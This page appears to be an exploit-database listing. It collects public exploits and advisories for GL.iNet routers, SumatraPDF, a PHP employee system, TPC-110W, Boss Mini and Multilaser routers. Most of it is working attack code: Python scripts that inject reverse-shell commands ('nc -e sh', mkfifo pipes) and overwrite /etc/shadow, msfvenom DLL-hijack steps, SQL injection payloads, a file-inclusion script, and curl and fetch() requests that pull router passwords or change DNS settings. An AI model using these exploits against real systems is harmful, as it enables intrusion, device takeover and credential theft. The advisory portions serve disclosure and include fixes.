GL.iNet AR300M versions 3.216 and below suffer from an OpenVPN client related remote code execution vulnerability.

    #!/usr/bin/env python3# Exploit Title: GL.iNet <= 3.216 Remote Code Execution via OpenVPN Client# Google Dork: intitle:"GL.iNet Admin Panel"# Date: XX/11/2023# Exploit Author: Michele 'cyberaz0r' Di Bonaventura# Vendor Homepage: https://www.gli-net.com# Software Link: https://fw.gl-inet.com/firmware/ar300m/nand/v1/openwrt-ar300m-3.216-0321-1679391449.tar# Version: 3.216# Tested on: GL.iNet AR300M# CVE: CVE-2023-46456import socketimport requestsimport readlinefrom time import sleepfrom random import randintfrom sys import stdout, argvfrom threading import Threadrequests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)def generate_random_string():  return ''.join([chr(randint(97, 122)) for x in range(6)])def add_config_file(url, auth_token, payload):  data = {'file': ('{}'.format(payload), 'client\ndev tun\nproto udp\nremote 127.0.0.1 1194\nscript-security 2')}  try:    r = requests.post(url, files=data, headers={'Authorization':auth_token}, verify=False)    r.raise_for_status()  except requests.exceptions.RequestException:    print('[X] Error while adding configuration file')    return False  return Truedef verify_config_file(url, auth_token, payload):  try:    r = requests.get(url, headers={'Authorization':auth_token}, verify=False)    r.raise_for_status()    if not r.json()['passed'] and payload not in r.json()['passed']:      return False  except requests.exceptions.RequestException:    print('[X] Error while verifying the upload of configuration file')    return False  return Truedef add_client(url, auth_token):  postdata = {'description':'RCE_client_{}'.format(generate_random_string())}  try:    r = requests.post(url, data=postdata, headers={'Authorization':auth_token}, verify=False)    r.raise_for_status()  except requests.exceptions.RequestException:    print('[X] Error while adding OpenVPN client')    return False  return Truedef get_client_id(url, auth_token, payload):  try:    r = requests.get(url, headers={'Authorization':auth_token}, verify=False)    r.raise_for_status()    for conn in r.json()['clients']:      if conn['defaultserver'] == payload:        return conn['id']    print('[X] Error: could not find client ID')    return False  except requests.exceptions.RequestException:    print('[X] Error while retrieving added OpenVPN client ID')  return Falsedef connect_vpn(url, auth_token, client_id):  sleep(0.25)  postdata = {'ovpnclientid':client_id, 'enableovpn':'true', 'force_client':'false'}  r = requests.post(url, data=postdata, headers={'Authorization':auth_token}, verify=False)def cleanup(url, auth_token, client_id):  try:    r = requests.post(url, data={'clientid':client_id}, headers={'Authorization':auth_token}, verify=False)    r.raise_for_status()  except requests.exceptions.RequestException:    print('[X] Error while cleaning up OpenVPN client')    return False  return Truedef get_command_response(s):  res = ''  while True:    try:      resp = s.recv(1).decode('utf-8')      res += resp    except UnicodeDecodeError:      pass    except socket.timeout:      break  return resdef revshell_listen(revshell_ip, revshell_port):  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  s.settimeout(5)  try:    s.bind((revshell_ip, int(revshell_port)))    s.listen(1)  except Exception as e:    print('[X] Exception "{}" encountered while binding reverse shell'.format(type(e).__name__))    exit(1)  try:    clsock, claddr = s.accept()    clsock.settimeout(2)    if clsock:      print('[+] Incoming reverse shell connection from {}:{}, enjoy ;)'.format(claddr[0], claddr[1]))      res = ''      while True:        command = input('$ ')        clsock.sendall('{}\n'.format(command).encode('utf-8'))        stdout.write(get_command_response(clsock))  except socket.timeout:    print('[-] No connection received in 5 seconds, probably server is not vulnerable...')    s.close()  except KeyboardInterrupt:    print('\n[*] Closing connection')    try:      clsock.close()    except socket.error:      pass    except NameError:      pass    s.close()def main(base_url, auth_token, revshell_ip, revshell_port):  print('[+] Started GL.iNet <= 3.216 OpenVPN client config filename RCE exploit')  payload = '$(busybox nc {} {} -e sh).ovpn'.format(revshell_ip, revshell_port)  print('[+] Filename payload: "{}"'.format(payload))  print('[*] Uploading crafted OpenVPN config file')  if not add_config_file(base_url+'/api/ovpn/client/upload', auth_token, payload):    exit(1)  if not verify_config_file(base_url+'/cgi-bin/api/ovpn/client/uploadcheck', auth_token, payload):    exit(1)  print('[+] File uploaded successfully')  print('[*] Adding OpenVPN client')  if not add_client(base_url+'/cgi-bin/api/ovpn/client/addnew', auth_token):    exit(1)  client_id = get_client_id(base_url+'/cgi-bin/api/ovpn/client/list', auth_token, payload)  if not client_id:    exit(1)  print('[+] Client ID: ' + client_id)  print('[*] Triggering connection to created OpenVPN client')  Thread(target=connect_vpn, args=(base_url+'/cgi-bin/api/ovpn/client/set', auth_token, client_id)).start()  print('[*] Starting reverse shell on {}:{}'.format(revshell_ip, revshell_port))  revshell_listen(revshell_ip, revshell_port)  print('[*] Clean-up by removing OpenVPN connection')  if not cleanup(base_url+'/cgi-bin/api/ovpn/client/remove', auth_token, client_id):    exit(1)  print('[+] Done')if __name__ == '__main__':  if len(argv) < 5:    print('Usage: {} <TARGET_URL> <AUTH_TOKEN> <REVSHELL_IP> <REVSHELL_PORT>'.format(argv[0]))    exit(1)  main(argv[1], argv[2], argv[3], argv[4])

GL.iNet AR300M 3.216 Remote Code Execution

GL.iNet AR300M versions 4.3.7 and below suffer from an OpenVPN client related remote code execution vulnerability.

    #!/usr/bin/env python3# Exploit Title: GL.iNet <= 4.3.7 Remote Code Execution via OpenVPN Client# Google Dork: intitle:"GL.iNet Admin Panel"# Date: XX/11/2023# Exploit Author: Michele 'cyberaz0r' Di Bonaventura# Vendor Homepage: https://www.gli-net.com# Software Link: https://fw.gl-inet.com/firmware/ar300m/nand/release4/openwrt-ar300m-4.3.7-0913-1694589403.tar# Version: 4.3.7# Tested on: GL.iNet AR300M# CVE: CVE-2023-46454import socketimport requestsimport readlinefrom time import sleepfrom random import randintfrom sys import stdout, argvfrom threading import Threadrequests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)def trigger_revshell(url, auth_token, payload):  sleep(0.25)  data = {    'jsonrpc': '2.0',    'id': randint(1000, 9999),    'method': 'call',    'params': [      auth_token,      'plugins',      'get_package_info',      {'name': 'bas{}e-files'.format(payload)}    ]  }  requests.post(url, json=data, verify=False)def get_command_response(s):  res = ''  while True:    try:      resp = s.recv(1).decode('utf-8')      res += resp    except UnicodeDecodeError:      pass    except socket.timeout:      break  return resdef revshell_listen(revshell_ip, revshell_port):  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  s.settimeout(5)  try:    s.bind((revshell_ip, int(revshell_port)))    s.listen(1)  except Exception as e:    print('[X] Exception "{}" encountered while binding reverse shell'.format(type(e).__name__))    exit(1)  try:    clsock, claddr = s.accept()    clsock.settimeout(2)    if clsock:      print('[+] Incoming reverse shell connection from {}:{}, enjoy ;)'.format(claddr[0], claddr[1]))      res = ''      while True:        command = input('$ ')        clsock.sendall('{}\n'.format(command).encode('utf-8'))        stdout.write(get_command_response(clsock))  except socket.timeout:    print('[-] No connection received in 5 seconds, probably server is not vulnerable...')    s.close()  except KeyboardInterrupt:    print('\n[*] Closing connection')    try:      clsock.close()    except socket.error:      pass    except NameError:      pass    s.close()def main(base_url, auth_token, revshell_ip, revshell_port):  print('[+] Started GL.iNet <= 4.3.7 RCE exploit')  payload = '$(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc {} {} >/tmp/f)'.format(revshell_ip, revshell_port)  print('[+] Reverse shell payload: "{}"'.format(payload))  print('[*] Triggering reverse shell connection')  Thread(target=trigger_revshell, args=(base_url+'/rpc', auth_token, payload)).start()  print('[*] Starting reverse shell on {}:{}'.format(revshell_ip, revshell_port))  revshell_listen(revshell_ip, revshell_port)  print('[+] Done')if __name__ == '__main__':  if len(argv) < 5:    print('Usage: {} <TARGET_URL> <AUTH_TOKEN> <REVSHELL_IP> <REVSHELL_PORT>'.format(argv[0]))    exit(1)  main(argv[1], argv[2], argv[3], argv[4])

GL.iNet AR300M 4.3.7 Remote Code Execution

GL.iNet AR300M versions 4.3.7 and below suffer from an arbitrary file writing vulnerability.

    #!/usr/bin/env python3# Exploit Title: GL.iNet <= 4.3.7 Arbitrary File Write# Google Dork: intitle:"GL.iNet Admin Panel"# Date: XX/11/2023# Exploit Author: Michele 'cyberaz0r' Di Bonaventura# Vendor Homepage: https://www.gli-net.com# Software Link: https://fw.gl-inet.com/firmware/ar300m/nand/release4/openwrt-ar300m-4.3.7-0913-1694589403.tar# Version: 4.3.7# Tested on: GL.iNet AR300M# CVE: CVE-2023-46455import cryptimport requestsfrom sys import argvrequests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)def craft_shadow_file(salted_password):  shadow_content  = 'root:{}:19459:0:99999:7:::\n'.format(salted_password)  shadow_content += 'daemon:*:0:0:99999:7:::\n'  shadow_content += 'ftp:*:0:0:99999:7:::\n'  shadow_content += 'network:*:0:0:99999:7:::\n'  shadow_content += 'nobody:*:0:0:99999:7:::\n'  shadow_content += 'dnsmasq:x:0:0:99999:7:::\n'  shadow_content += 'stubby:x:0:0:99999:7:::\n'  shadow_content += 'ntp:x:0:0:99999:7::\n'  shadow_content += 'mosquitto:x:0:0:99999:7::\n'  shadow_content += 'logd:x:0:0:99999:7::\n'  shadow_content += 'ubus:x:0:0:99999:7::\n'  return shadow_contentdef replace_shadow_file(url, auth_token, shadow_content):  data = {    'sid': (None, auth_token),    'size': (None, '4'),    'path': (None, '/tmp/ovpn_upload/../../etc/shadow'),    'file': ('shadow', shadow_content)  }  requests.post(url, files=data, verify=False)def main(base_url, auth_token):  print('[+] Started GL.iNet <= 4.3.7 Arbitrary File Write exploit')  password = input('[?] New password for root user: ')  salted_password = crypt.crypt(password, salt=crypt.METHOD_MD5)  shadow_content = craft_shadow_file(salted_password)  print('[+] Crafted shadow file:\n{}'.format(shadow_content))  print('[*] Replacing shadow file with the crafted one')  replace_shadow_file(base_url+'/upload', auth_token, shadow_content)  print('[+] Done')if __name__ == '__main__':  if len(argv) < 3:    print('Usage: {} <TARGET_URL> <AUTH_TOKEN>'.format(argv[0]))    exit(1)  main(argv[1], argv[2])

GL.iNet AR300M 4.3.7 Arbitrary File Write

SumatraPDF version 3.5.2 suffers from a DLL hijacking vulnerability using CRYPTBASE.DLL. DLL hijacking in this version was already discovered by Ravishanka Silva in February of 2024 but the findings did not include this DLL.

    SumatraPDF 3.5.2 DLL Hijack# Exploit Title: Sumatra PDF 3.5.2 DLL Hijack# Date: 03.03.2024# Exploit Author: Krishna Vamshi Katta Rokkaiah# Vendor Homepage: https://www.sumatrapdfreader.org/free-pdf-reader# Software Link: https://www.sumatrapdfreader.org/download-free-pdf-viewer# Version: 3.5.2# Tested on: Windows 11# CVE : CVE-2024-25884Description:In Sumatra PDF version 3.5.2, a DLL hijacking vulnerability is possible allowing a local attacker to get a shell and execute code on the host system in context of the currently logged-on user. This is possible by creating / placing a malicious DLL in the installation directory. The affected DLL is CRYPTBASE.DLL.Proof of Concept:1. Use MSFVenom to create a malicious DLL:msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=7777 -f dll -o CRYPTBASE.DLL2. Copy this file to the Sumatra PDF installation folder:C:\Users\<username>\AppData\Local\SumatraPDF\3. Start a listener in attacking system:nc -nlvp 77774. Start the Sumatra PDF application and notice a reverse shell in the attacking system.Demo:https://drive.google.com/file/d/1dSJG_JwxPd9ztAzDs6xV4y83-c_83AOx/view

SumatraPDF 3.5.2 DLL Hijacking

Employee Management System version 1.0-2024 suffers from a remote SQL injection vulnerability. Original discovery of this finding is attributed to Ozlem Balci in January of 2024.

    ## Title: employee_akpoly-management-system-1.0-2024 Multiple-SQLi## Author: nu11secur1ty## Date: 03/01/2024## Vendor: https://www.sourcecodester.com/users/walterjnr1## Software: https://www.sourcecodester.com/php/16999/employee-management-system.html## Reference: https://portswigger.net/web-security/sql-injection## Description:Potential SQLi detected in password parameter. Please confirm itmanually... The payload from the puncher_SQLi_bypass_authenticationmodule was submitted successfully after the test. You must testmanually to confirm this vulnerability! By using this vulnerabilitythe attackercan get control against an admin account and even more bad things!STATUS: HIGH- Vulnerability[+]Payload:```mysql---Parameter: txtpassword (POST)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)    Payload: txtusername=WKFNZjdP&txtpassword=y6Q!i4e!W6' OR NOT2215=2215# TKHd&btnlogin=    Type: error-based    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: txtusername=WKFNZjdP&txtpassword=y6Q!i4e!W6' OR (SELECT2145 FROM(SELECT COUNT(*),CONCAT(0x717a717071,(SELECT(ELT(2145=2145,1))),0x716a787171,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a)# JjHm&btnlogin=    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: txtusername=WKFNZjdP&txtpassword=y6Q!i4e!W6' AND (SELECT3563 FROM (SELECT(SLEEP(7)))nLaZ)# ZzRM&btnlogin=---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Walterjnr1/2024/employee_akpoly-1.0-2024)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/03/employeeakpoly-10-2024-multiple-sqli.html)## Time spend:00:35:00

Employee Management System 1.0-2024 SQL Injection

TPC-110W suffers from a missing authentication vulnerability.

    #include <stdio.h>#include <stdlib.h>#include <string.h>#include <sys/socket.h>#include <arpa/inet.h>#include <unistd.h>int main(int argc, char *argv[]) {    int sock;    struct sockaddr_in serv_addr;    char command[512];    sock = socket(AF_INET, SOCK_STREAM, 0);    if (sock < 0) {        perror("socket");        exit(1);    }    memset(&serv_addr, '0', sizeof(serv_addr));    serv_addr.sin_family = AF_INET;    serv_addr.sin_port = htons(8888); // The default port of TPC-110W is 8888    if (inet_pton(AF_INET, "192.168.1.10", &serv_addr.sin_addr) <= 0) { // Assuming the device's IP address is 192.168.1.10        perror("inet_pton");        exit(1);    }    if (connect(sock, (struct sockaddr *)&serv_addr, sizeof(serv_addr)) < 0) {        perror("connect");        exit(1);    }    // Run command with root privileges    snprintf(command, sizeof(command), "id\n"); // Check user id    write(sock, command, strlen(command));    memset(command, '0', sizeof(command));    read(sock, command, sizeof(command));    printf("%s\n", command);    close(sock);    return 0;}//gcc -o tpc-110w-exploit tpc-110w-exp

TPC-110W Missing Authentication

Boss Mini version 1.4.0 suffers from a local file inclusion vulnerability.

    # Exploit Title: Boss Mini 1.4.0 - local file inclusion# Date: 07/12/2023# Exploit Author: [nltt0] (https://github.com/nltt-br))# CVE: CVE-2023-3643''' _____       _                              _____ /  __ \     | |                            /  ___|| /  \/ __ _| | __ _ _ __   __ _  ___  ___ \ `--. | |    / _` | |/ _` | '_ \ / _` |/ _ \/ __| `--. \| \__/\ (_| | | (_| | | | | (_| | (_) \__ \/\__/ / \____/\__,_|_|\__,_|_| |_|\__, |\___/|___/\____/                             __/ |                                            |___/                  '''from requests import post from urllib.parse import quotefrom argparse import ArgumentParsertry:    parser = ArgumentParser(description='Local file inclusion [Boss Mini]')    parser.add_argument('--domain', required=True, help='Application domain')    parser.add_argument('--file', required=True, help='Local file')    args = parser.parse_args()    host = args.domain    file = args.file    url = '{}/boss/servlet/document'.format(host)    file2 = quote(file, safe='')    headers = {        'Host': host,        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0',        'Content-Type': 'application/x-www-form-urlencoded',        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange',        'Referer': 'https://{}/boss/app/report/popup.html?/etc/passwd'.format(host)    }    data = {        'path': file2    }    try:        req = post(url, headers=headers, data=data, verify=False)        if req.status_code == 200:            print(req.text)    except Exception as e:        print('Error in {}'.format(e))          except Exception as e:    print('Error in {}'.format(e))

Boss Mini 1.4.0 Local File Inclusion

Multilaser RE160 versions 5.07.51_pt_MTL01 and 5.07.52_pt_MTL01 suffer from an access control bypass vulnerability through cookie manipulation.

=====[Tempest Security Intelligence - Security Advisory -  
CVE-2023-38946]=======

  Access Control Bypass in Multilaser router's Web Management Interface

  Author: Vinicius Moraes  < vinicius.moraes.w () gmail com >

=====[Table of  
Contents]========================================================

1. Overview  
2. Detailed description  
3. Other contexts & solutions  
4. Acknowledgements  
5. Timeline  
6. References

=====[1.  
Overview]==============================================================

* Systems affected: Multilaser RE160 web interface -  
V5.07.51_pt_MTL01(verified)  
                                                   -  
V5.07.52_pt_MTL01(verified)  
                                        (other routers/versions may be  
affected)  
* Release date: 28/02/2024  
* CVSS score: 7.7 / High  
* CVSS vector:  
CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N  
* Impact: This vulnerability allows attackers to bypass the access control  
of  
          the router's web interface and perform management actions, such as  
          changing the DNS settings, enabling router remote access,  
changing the  
          IP routing table, and retrieving the WiFi and management  
application  
          passwords. A noteworthy aspect also regards the fact that the  
attack  
          can be conducted remotely.

=====[2. Detailed  
description]==================================================

The affected Multilaser router has a web management interface designed to  
graphically assist users in configuring features and diagnosing problems.  
However, there is a bug in its access control mechanism that allows  
unauthenticated users to access the router's management features.

In order to exploit this bug, it is necessary to add an "admin:" cookie in  
the  
requests. The following example shows how an unauthenticated user (not  
bearing  
a credential or session token) could perform it by using the curl tool[1]  
to  
retrieve, for example, a backup of the router config, which contains its  
web  
interface password:

[snippet]

$ # traditional unauthenticated request being redirected to the login page  
$ curl -is [routerIpAddress]/cgi-bin/DownloadCfg/C.cfg | grep -E  
'HTTP/|Locatio'  
HTTP/1.0 302 Redirect  
Location: http://[routerIpAddress]/login.asp  
$  
$ # malicious unauthenticated request getting the web interface password  
$ # (in this example: "pass123")  
$ curl -isH 'Cookie: admin:' [routerIpAddress]/cgi-bin/DownloadCfg/C.cfg |  
grep  
-E 'HTTP/|http_passwd'  
HTTP/1.0 200 OK  
http_passwd=pass123

[/snippet]

By performing the aforementioned steps, an attacker gains access to all  
features  
of the web interface, either by exploiting the issue in other endpoints or  
by  
using the interface password, contained in the router config, as a  
traditional  
user.

This vulnerability can be exploited remotely via a malicious mobile/desktop  
application performing HTTP requests against the router, or locally by  
connecting to a vulnerable router (such as through the wireless  
infrastructure  
of a coffee shop or airport).

=====[3. Other contexts &  
solutions]============================================

Conceptually, in order to fix this issue, the server receiving the request  
must  
always validate the value of the cookie as a prerequisite for enforcing  
access  
control. Besides that, this value cannot be predictable. Upon not receiving  
a  
valid session token within the request, users should be redirected to the  
login  
page.

Practically, updating to the latest firmware (V5.07.52_pt_MTL01) will  
reduce the  
attack window for this vulnerability, limiting the exploitation to only work  
when there is an active user session on the router. However, this equipment  
is  
also affected by another vulnerability with the same impact and no attack  
window  
limitation[3].

Furthermore, Multilaser informed that they contacted the firmware vendor of  
the  
model RE160, but due to the age of the equipment and its limitations, it  
will  
not receive an update. Therefore, it is recommended to replace the RE160  
router  
with a new one that is receiving updates (such as RE160V or RE163V)[4][5].

=====[4.  
Acknowledgements]======================================================

  Joaquim Brasil de Oliveira  < palulabrasil () gmail com >  
                              < twitter.com/palulabr >  
  Tempest Security Intelligence[2]

=====[5.  
Timeline]==============================================================

28/04/2023 - The bug regarding model RE160 was reported to vendor;  
29/06/2023 - A new contact was made with the company;  
29/06/2023 - Vendor sent the available latest firmware for RE160;  
07/07/2023 - It was confirmed that the latest firmware was still vulnerable;  
26/10/2023 - Vendor informed that RE160 will not receive a full fix.

=====[6.  
References]============================================================

  [1] https://curl.se  
  [2] https://tempest.com.br  
  [3] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38945  
  [4]  
https://suporte.multilaser.com.br/produtos/rot-300mbps-ipv6-2-4-ghz-2-ant-re160v  
  [5]  
https://suporte.multilaser.com.br/produtos/rot-300mbps-ipv6-2-4-ghz-3-ant-re163v

Multilaser RE160 Cookie Manipulation Access Bypass

Multilaser RE160V web management interface versions 12.03.01.08_pt and 12.03.01.09_pt along with RE160 versions 5.07.51_pt_MTL01 and 5.07.52_pt_MTL01 suffer from an access control bypass vulnerability through URL manipulation.

    =====[Tempest Security Intelligence - Security Advisory -CVE-2023-38945]=======  Access Control Bypass in Multilaser routers' Web Management Interface  Author: Vinicius Moraes  < vinicius.moraes.w () gmail com >=====[Table ofContents]========================================================1. Overview2. Detailed description3. Other contexts & solutions4. Acknowledgements5. Timeline6. References=====[1.Overview]==============================================================* Systems affected: Multilaser RE160 web interface -V5.07.51_pt_MTL01(verified)                                                   -V5.07.52_pt_MTL01(verified)                                        (other routers/versions may beaffected)                    Multilaser RE160V web interface - V12.03.01.08_pt(verified)                                                    - V12.03.01.09_pt(verified)                                        (other routers/versions may beaffected)                    Multilaser RE163V web interface - V12.03.01.08_pt(verified)                                        (other routers/versions may beaffected)* Release date: 28/02/2024* CVSS score: 7.7 / High* CVSS vector:CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N* Impact: This vulnerability allows attackers to bypass the access controlof          the routers' web interface and perform management actions, such as          changing the DNS settings, enabling router remote access,changing the          IP routing table, and retrieving the WiFi and managementapplication          passwords. A noteworthy aspect also regards the fact that theattack          can be conducted remotely.=====[2. Detaileddescription]==================================================The affected Multilaser routers have a web management interface designed tographically assist users in configuring features and diagnosing problems.However, there is a bug in its access control mechanism that allowsunauthenticated users to access routers' management features.In order to exploit this bug, it is necessary to add a specific extensionat theend of the URLs. Some acceptable extension values are: js, css, png, jpg,gif,jsp. The following example shows how an unauthenticated user (not bearing acredential or session token) could perform it by using the curl tool[1] toretrieve, for example, a backup of the RE160 router config, which containsitsweb interface password:[snippet]$ # traditional unauthenticated request being redirected to the login page$ curl -is [routerIpAddress]/cgi-bin/DownloadCfg/C.cfg | grep -E'HTTP/|Locatio'HTTP/1.0 302 RedirectLocation: http://[routerIpAddress]/login.asp$$ # malicious unauthenticated request getting the web interface password$ # (in this example: "pass123")$ curl -is [routerIpAddress]/cgi-bin/DownloadCfg/.js | grep -E'HTTP/|http_pass'HTTP/1.0 200 OKhttp_passwd=pass123[/snippet]Furthermore, the next example presents part of a JavaScript code that couldbeadded to a malicious website with the purpose of changing the router's DNSaddress and enabling remote access on vulnerable RE160V and RE163V routers.This can be achieved by exploiting this access control issue and a CSRF[3]:[code]fetch('http://[routerIpAddress]/goform/setSysTools/.js', {    'method': 'POST',    'mode': 'no-cors',    'headers': {        'Content-Type': 'application/x-www-form-urlencoded'    },    'body':'module2=wanAdvCfg&module3=lanCfg&lanDns1=[newDnsAddress]&lanDns2=&    module4=remoteWeb&remoteWebEn=true&remoteWebType=any&remoteWebPort=8080'})[/code]By performing the aforementioned steps, an attacker can gain access to allfeatures of the web interface.This vulnerability can be exploited remotely via a malicious website or amobile/desktop application performing HTTP requests against the router. Andalso locally, by connecting to a vulnerable router (such as through thewirelessinfrastructure of a coffee shop or airport).=====[3. Other contexts &solutions]============================================Conceptually, in order to fix this issue, the server receiving the requestmustalways validate the session token in authenticated features as aprerequisitefor enforcing access control, regardless of any extension in the URL. Uponnotreceiving a valid session token within the request, users should beredirectedto the login page.Practically, to mitigate this issue, the RE160V should be updated tofirmwareV12.03.01.12 or newer[4], the RE163V to firmware V12.03.01.10 or newer[5].Multilaser informed that they contacted the firmware vendor of the modelRE160,but due to the age of the equipment and its limitations, it will notreceive anupdate to fix the issue. Therefore, it is recommended to replace the RE160router with a new one that has received the fix (such as RE160V or RE163V).=====[4.Acknowledgements]======================================================  Joaquim Brasil de Oliveira  < palulabrasil () gmail com >                              < twitter.com/palulabr >  Tempest Security Intelligence[2]=====[5.Timeline]==============================================================13/02/2023 - The latest available firmware for model RE163V (V12.03.01.10)fixedthe bug;28/04/2023 - The bug regarding model RE160V was reported to the vendor;29/06/2023 - A new contact was made with the company;29/06/2023 - Vendor shared a firmware update (V12.03.01.09) for RE160V;07/07/2023 - The same bug in model RE160 was reported to the vendor;16/10/2023 - Vendor shared a new firmware for RE160V (V12.03.01.12) wherethebug was fixed;26/10/2023 - Vendor informed that RE160 will not receive a fix;26/10/2023 - Vendor released the RE160V update on its website[4].=====[6.References]============================================================  [1] https://curl.se  [2] https://tempest.com.br  [3] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31152  [4]https://suporte.multilaser.com.br/produtos/rot-300mbps-ipv6-2-4-ghz-2-ant-re160v  [5]https://suporte.multilaser.com.br/produtos/rot-300mbps-ipv6-2-4-ghz-3-ant-re163v

Multilaser RE160V / RE160 URL Manipulation Access Bypass

Multilaser RE160V web management interface versions 12.03.01.09_pt and 12.03.01.10_pt suffer from an access control bypass vulnerability through header manipulation.

ulldisclosure-bounces@seclists.org>  
Status: RO  
Content-Length: 5433  
Lines: 153

=====[Tempest Security Intelligence - Security Advisory -  
CVE-2023-38944]=======

  Access Control Bypass in Multilaser routers' Web Management Interface

  Author: Vinicius Moraes  < vinicius.moraes.w () gmail com >

=====[Table of  
Contents]========================================================

1. Overview  
2. Detailed description  
3. Other contexts & solutions  
4. Acknowledgements  
5. Timeline  
6. References

=====[1.  
Overview]==============================================================

* Systems affected: Multilaser RE160V web interface - V12.03.01.09_pt  
(verified)  
                                        (other routers/versions may be  
affected)  
                    Multilaser RE163V web interface - V12.03.01.10_pt  
(verified)  
                                        (other routers/versions may be  
affected)  
* Release date: 28/02/2024  
* CVSS score: 7.7 / High  
* CVSS vector:  
CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N  
* Impact: This vulnerability allows attackers to bypass the access control  
of  
          the routers' web interface and perform management actions, such as  
          changing the DNS settings, enabling router remote access,  
changing the  
          IP routing table, and retrieving the WiFi and management  
application  
          passwords. A noteworthy aspect also regards the fact that the  
attack  
          can be conducted remotely.

=====[2. Detailed  
description]==================================================

The affected Multilaser routers have a web management interface designed to  
graphically assist users in configuring features and diagnosing problems.  
However, there is a bug in its access control mechanism that allows  
unauthenticated users to access the routers' management features.

In order to exploit this bug, it is necessary to remove the Host header of  
the  
HTTP requests. The following example shows how an unauthenticated user (not  
bearing a credential or session token) could perform it by using the curl  
tool[1] to retrieve, for example, a backup of the router config:

[snippet]  
$ # traditional unauthenticated request being redirected to the login page  
$ curl -is [routerIpAddress]/cgi-bin/DownloadCfg/RouterCfm.cfg | head -8  
HTTP/1.0 302 Redirect  
Server: GoAhead-Webs  
Date: Sun Jun 28 11:59:42 2009  
Pragma: no-cache  
Cache-Control: no-cache  
Content-Type: text/html  
Location: http://[routerIpAddress]/login.html

$ # malicious unauthenticated request getting the router config  
$ curl -isOH 'Host:' [routerIpAddress]/cgi-bin/DownloadCfg/RouterCfm.cfg  
$ head -8 RouterCfm.cfg  
HTTP/1.0 200 OK  
Date: Sun Jun 28 12:00:00 2009  
Server: GoAhead-Webs  
Last-modified: Sun Jun 28 12:00:00 2009  
Content-length: 16108  
Content-type: config/conf  
Connection: close

[/snippet]

By performing the aforementioned steps, an attacker gains access to all  
features  
of the web interface, either by exploiting the issue in other endpoints or  
by  
using the interface password, contained in the router config, as a  
traditional  
user:

[snippet]

$ # getting the web interface password (in this example: "myPass333")  
$ # stored in base64 in the config file  
$ awk -F 'd=' '/http_passwd=/{ print $2 }' RouterCfm.cfg | tr -d '\15'  
bXlQYXNzMzMz  
$ # decoding the web interface password  
$ echo "bXlQYXNzMzMz" | base64 -d  
myPass333

[/snippet]

This vulnerability can be exploited remotely via a malicious mobile/desktop  
application performing HTTP requests against the router, or locally by  
connecting to a vulnerable router (such as through the wireless  
infrastructure  
of a coffee shop or airport).

=====[3. Other contexts &  
solutions]============================================

Conceptually, in order to fix this issue, the server receiving the request  
must  
always validate the session token as a prerequisite for enforcing access  
control, regardless of any header. Upon not receiving a valid session token  
within the request, users should be redirected to the login page.

Practically, to mitigate this issue, the routers should be updated to  
firmware  
V12.03.01.12 or newer[3][4].

=====[4.  
Acknowledgements]======================================================

  Joaquim Brasil de Oliveira  < palulabrasil () gmail com >  
                              < twitter.com/palulabr >  
  Tempest Security Intelligence[2]

=====[5.  
Timeline]==============================================================

28/04/2023 - The bug regarding model RE163V was reported to the vendor;  
29/06/2023 - A new contact was made with the company;  
29/06/2023 - Vendor informed they were analysing the bug;  
19/07/2023 - Vendor shared a new firmware update for RE163V;  
25/07/2023 - The same bug in model RE160V was reported to the vendor;  
04/08/2023 - Vendor shared a new firmware update for RE163V;  
30/08/2023 - Vendor fixed the bug in RE163V with firmware V12.03.01.12;  
16/10/2023 - Vendor fixed the bug in RE160V with firmware V12.03.01.12;  
26/10/2023 - vendor released the updates on its website[3][4].

=====[6.  
References]============================================================

  [1] https://curl.se  
  [2] https://tempest.com.br  
  [3]  
https://suporte.multilaser.com.br/produtos/rot-300mbps-ipv6-2-4-ghz-3-ant-re163v  
  [4]  
https://suporte.multilaser.com.br/produtos/rot-300mbps-ipv6-2-4-ghz-2-ant-re160v

Tag

#auth